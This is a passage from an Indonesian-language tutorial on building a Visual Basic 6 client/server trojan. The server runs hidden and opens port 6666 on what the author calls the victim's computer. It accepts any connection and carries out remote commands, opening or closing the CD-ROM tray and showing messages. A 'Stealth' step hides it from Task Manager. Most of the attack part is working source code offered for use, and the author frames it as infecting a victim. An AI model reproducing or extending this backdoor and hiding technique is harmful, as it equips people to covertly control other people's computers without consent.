Klik ganda pada Winsock dan pilih pada menu event “Connect”. (spt pada gbr):
Lalu tambahkan kode berikut:
Private Sub tcpClient_Connect()
lblStatus.Caption = "Connected"
End Sub
Keterangan “Connected” pada label status hanya akan tampil setelah SERVER merespon.
Half-Execution
Mungkin anda bertanya kenapa saya menyebutnya Half-Execution. Alasanya ialah karena pada program CLIENT ini Eksekusi yang kita inginkan belumlah dapat di jalankan tanpa bantuan SERVER. Prinsip kerja program CLIENT dalam melaksanakan eksekusi ialah hanya sebagai “Commander” atau pemberi instruksi.
Maksudnya disini program CLIENT akan mengirimkan data berupa ‘string’ kepada program SERVER yang nantinya akan diolah (diterjemahakan) oleh program SERVER sebagai suatu perintah untuk melaksanakan eksekusi. Ok..mari kita mulai….
Klik ganda pada tombol Open cd-rom lalu tambahkan kode berikut:
Private Sub cmdOpen_Click()
tcpClient.SendData "opn” 'Mengirimkan string ke server
End Sub
Klik ganda pada tombol Close cd-rom lalu tamahkan kode berikut:
Private Sub cmdClose_Click()
tcpClient.SendData "cls” 'Mengirimkan string ke server
End Sub
Klik ganda pada tombol Send message dan tambahkan kode berikut:
Private Sub cmdMsg_Click()
tcpClient.SendData "msg" & txtMsg 'Mengirim string ke server beserta isi txtbox
End Sub
Selamat Program CLIENT sudah selesai…….!!!!
Debug Client
Program CLIENT yang baru kita buat diatas belumlah sempurna. Saya yakin masih banyak terdapat bug pada program tersebut. Oleh karena itu marilah kita mencoba untuk menyempurnakanya.
-
Tombol Disconnect
Pada object ini yang pertama yang harus kita perhatikan ialah Property dari tombol ini. Saat Program dijalankan pertama kali sebaiknya tombol ini berada pada keadaan ‘disabled’ (mati). Karena seperti yang sudah kita ketahui sebelumnya fungsi dari tombol ini adalah memutuskan Koneksi ke Server.
Pada saat kita menjalankan program ini tentu saja belum ada koneksi sama sekali terhadap SERVER, oleh karena itu ada baiknya kita mematikan tombol ini dengan merubah property cmdDisconnect.Enabled manjadi false pada jendela property.
-
On Error Resume Next
Ada baiknya sebelum mengetikan code pada badan sub, kita awali dengan mengetikan On Error Resume Next agar ketika terjadi kesalahan program kita tidak mengeluarkan pesan error dan tidak keluar dari program.
Program SERVER
Setelah program CLIENT selesai kita buat sekarang saatnya kita membuat program Executor yang sebenarnya yaitu program SERVER. Apakah program CLIENT anda masih terbuka? Sebaiknya iya agar kita lebih mudah dalam mengerjakan pogram SERVER.
Pertama jalankan kembali aplikasi visual basic seperti biasa dan pilih Standard EXE maka akan tampil tampilan default beserta tetek bengeknya…. Pada program SERVER ini kita hanya membutuhkan satu control yaitu MS WINSOCK CONTROL. Letakan satu winsock kedalam form dan beri nama tcpServer Bila belum tersedia pada toolbar, load kembali seperti pada pembahasan sebelumnya.. Dan jangan lupa mengganti nama form menjadi frmServer, jangan lupa juga untuk menguah property Visible-nya menjadi false.
Open Gate
Kita akan mulai dari terhnik termudah dulu yaitu Open Gate. Mari kita Mulai……
Klik ganda pada form lalu masukan kode berikut:
Private Sub Form_Load()
On Error Resume Next
tcpServer.LocalPort = 6666
tcpServer.Listen
End Sub
Maksud dari script diatas:
Pertama winsock (tcpServer) akan mengecek pada port yang kita masukan yaitu 6666 (nomor port yang sama dengan program CLIENT). Setelah itu winsock akan membuka port tersebut dengan perintah Listen. Tujuannya ialah : agar program CLIENT yang mencoba untuk Connect ke computer korban dapat masuk melaliu port yang telah kita buka yaitu port 6666.
Sekarang kita akan memberi kode pada winsock jadi Klikganda pada winsock control dan pilih “connection request” pada combobox event ( kalau kurang jelas lihat pembahasan pada program CLIENT)
Tambahkan kode berikut:
Private Sub tcpServer_ConnectionRequest(ByVal requestID As Long)
On Error Resume Next
tcpServer.Close
tcpServer.Accept requestID
End Sub
Maksud dari script diatas:
Pertama winsock akan menutup koneksi untuk menghindari terjadinya error, lalu ia akan menerima semua request yang masuk ( request dari program CLIENT).
Masih pada winsock, pilih “error” pada combobox event dan beri kode berikut:
Private Sub tcpServer_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
On Error Resume Next
Do While tcpServer.State <> sckClosed
tcpServer.Close
loop
tcpServer.Listen
End Sub
Maksud dari script diatas:
Saat terjadi error pada koneksi, winsock akan segera menutup koneksi setelah itu ia akan membuka kembali port agar bisa dihubungi kembali oleh server.
Waw…untuk membuka pertahanan victim cukup panjang bukan? Sekarang marilah kita melangkah ke tahap berikutnya yaitu melakukan infeksi kedalam computer korban.
Execution
Sekarang saatnya kita buat program pengeksekusi yang sebenarnya. Sebelum kita masuk kebagian utama, pertama-tama tambahkan sebuah module kosong. Pilih Project “diatas layar” dan pilih add module. Lalu buka modul kosong tsb.
Untuk membuka atau menutup CD-ROM kita perlu menggunakan fungsi API pada windows. Oleh karma itu kita perlu API viewer.
Klik pada add-ins lalu klik API Viewer. Jika anda tidak melihatnya pada daftar maka klik Add-In Manager lalu pilih kemudian tekan “OK”. Saat kamu membuka API Viewer, kamu akan melihat jendela baru. Klik File lalu pilih load textfile dan pilih WIN32API.txt truss buka dech.
Load WIN32API.txt file
Pada mciSendString seperti yang ditunjukan oleh gambar, set Declaration Scope menjadi Public lalu tambahkan pada module. Tekan Insert untuk menambahkanya secara otomatis
Sekarang kita siap untuk memberi kode pada Open / Close cd-rom. Kembali ke form dan Klik ganda pada winsock dan pilih “DataArrival” pada procedure window lalu tambahkan kode beriktu:
Private Sub tcpServer_DataArrival(ByVal bytesTotal As Long)
Dim varData As String
Dim strData As String
tcpServer.GetData strData, vbString
varData = Right(strData, Len(strData) - 3)
Select Case Cstr(strdata)
Case "opn"
mciSendString "Set CDAudio Door Open", vbNullString, 0, 0
Case "cls"
mciSendString "Set CDAudio Door Closed", vbNullString, 0, 0
Case "msg"
MsgBox varData, vbInformation, "Information"
End Select
End Sub
Maksud dari script diatas:
Saat data diterima, pertama program akan mendeklarasikan vardata dan strdata sebagai string dengan strdata sebagai penampung data yang masuk. Sedangkan vardata ialah data bawaan yang tidak diproses sebagai perintah ( pesan pada msgbox ). Setelah itu program akan mengambil data yang masuk dengan mengkonversinya terlebih dahulu menjadi string, jika tidak data yang masuk akan bertipe byte. Lalu program akan menyeleksi data yang masuk apakah data bernilai opn, cls, atau msg. jika data bernilai opn maka akan dilakukan perintah pembukaan CD-ROOM, jika data adalah cls maka akan dilakukan perintah penutupn CD-ROOM, dan jika data bernilai msg maka akan ditampilkan msgbox berisi pesan yang ditampung pada variael vardata.
Stealth
Untuk lebih memperpanjang umur program Trojan kita, ada baiknya kita buat program kita seolah tidak terlihat. Caranya ialah menghilangkan program dari task manager. Untuk melakukanya : Tambahkan script berikut pada sub Form_Load sehingga menjadi :
Private Sub Form_Load()
On Error Resume Next
tcpServer.LocalPort = 6666
tcpServer.Listen
App.TaskVisible = False
End Sub
3. TAHAP AKHIR
Pada tahap akhir ini saya tidak akan menjelaskan apa-apa, pada tahap ini anda tinggal mengkompile program2 yang telah dibuat tersebut dan mungkin mengadakan sedikit pengetesan dan debugging.
PENUTUP
Sebelumnya saya ucapkan terimakasih pada semua yang telah mendukung dalam penyusunan artikel ini. Selain itu saya juga mohon maaf apa bila ada kekurangan dan ketidak sempurnaan pada bahasan ini. Karena sebagai manusia saya tidak akan luput dari kesalahan. Saya juga mohon maaf yang sebesar-besarnya apabila rekan-rekan sekalian ada yang tidak menyukai artikel yang saya tulis. Artikel ini semata-mata saya buat tidak lain ialah hanya untuk berbagi pengalaman. Karena saya sadar “Diatas langit masih ada langit” jadi saya sangat mengharapkan saran dan kritik dari rekan-rekan sekalian demi kemajuan ilmu pengetahuan. Wassalam…
